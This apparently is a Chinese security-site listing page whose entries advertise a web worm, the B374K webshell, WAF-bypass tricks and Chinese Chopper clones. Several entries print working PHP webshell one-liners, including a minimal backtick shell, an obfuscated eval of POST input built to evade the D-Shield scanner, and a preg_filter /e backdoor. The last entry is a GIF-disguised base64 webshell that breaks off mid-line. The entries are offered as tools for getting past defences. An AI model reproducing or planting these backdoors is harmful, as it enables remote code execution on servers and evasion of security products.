最新一代WEB蠕虫被捕获 强到刺瞎你的狗眼!

最近,一个很新颖而且强大的web蠕虫被捕获,它功能上相当于一个综合漏洞扫描器。该蠕虫主要利用一些web程序的高危漏洞进行传播,其中包括phpmyadmin,wordpress,joomla,magento等等知名网站app的漏洞,还有破壳漏洞,ssh弱口令,sql注入,自动提权。

B374K源自国外的强大PHP WEBSHELL

B374K PHP WEBSHELL

PHP绕过各种waf技巧-CVE-2015-4024

今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版:http://drops.wooyun.org/papers/6077,英文版 :https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。

最短php一句话

最短php一句话

<?=`$_GET[1]`;


aspx 反射后门

首先将test.aspx上传支持aspx的网站

http://www.xxx.com/test.aspx

打开后显示

会显示网站应用的根路径


Windows、Linux后门合集解析

CKnife java版本的中国菜刀 可过各种waf狗

CKnife java版本菜刀

万众电子期刊在线阅读系统后台上传漏洞

再次拿到了万众电子期刊在线阅读系统。搭建测试,修复了前台的SQL注入以及XSS跨站。有留言的地方增加了验证码.
后台查看上传的过程admin\includes\upload.inc.php

<?php
header('content-Type:text/html;charset=UTF-8');
require '../../includes/other.fun.php';
require '../../includes/file.fun.php';
$input=$_GET['input'];
$form=$_GET['form'];
$dir=$_GET['dir'];//目录
$text=$_GET['text'];
$type=$_GET['type'];
?>

D盾的软肋 最新过D盾一句话

<?php $str_tmp = "eval"; $str_tmp .= "(";$str_tmp .= "$";$str_tmp .= "_PO";$str_tmp .= "ST[1]);";@eval($str_tmp); ?>

今日要分享的一句话:

<?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e';@preg_filter('|.*|e', $_REQUEST['1'], ''); ?>

原创过狗php一句话

GIF89a
<?
$ran = 'cmFuZ2U=';
$ran1 = 'ba'.'se'.'64'.'_decode';
$int = $ran1($ran);
$int1 = $int(0,200);
$ch = 'c&#39